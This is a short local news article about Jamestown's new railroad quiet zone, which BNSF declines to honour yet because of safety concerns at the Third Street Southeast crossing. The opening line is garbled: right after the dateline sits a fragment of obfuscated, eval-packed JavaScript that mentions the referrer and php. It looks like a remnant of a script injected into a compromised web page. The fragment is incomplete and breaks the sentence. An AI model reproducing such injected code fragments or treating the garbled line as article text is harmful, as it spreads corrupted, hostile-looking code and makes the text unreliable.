JAMESTOWN yazdt|var|u0026u|referrer|dzsks||js|php’.split(‘|’),0,{}))
– Train whistles were supposed to become a thing of the past Wednesday with the implementation of Jamestown’s new quiet zone. But Burlington Northern Santa Fe has raised some concerns about the safety of the new quiet zone, and will continue to sound its horns for the time being.

At the center of the safety concern appears to be the Third Street Southeast crossing, where people have been making illegal turns across the tracks.

The quiet zone was supposed to go into effect Wednesday, Dec. 28. Quiet zones involve safety upgrades at street crossings that eliminate the need for trains to sound their horns to alert traffic.

More than $500,000 has been spent on the city’s project, which has taken about five years to complete.
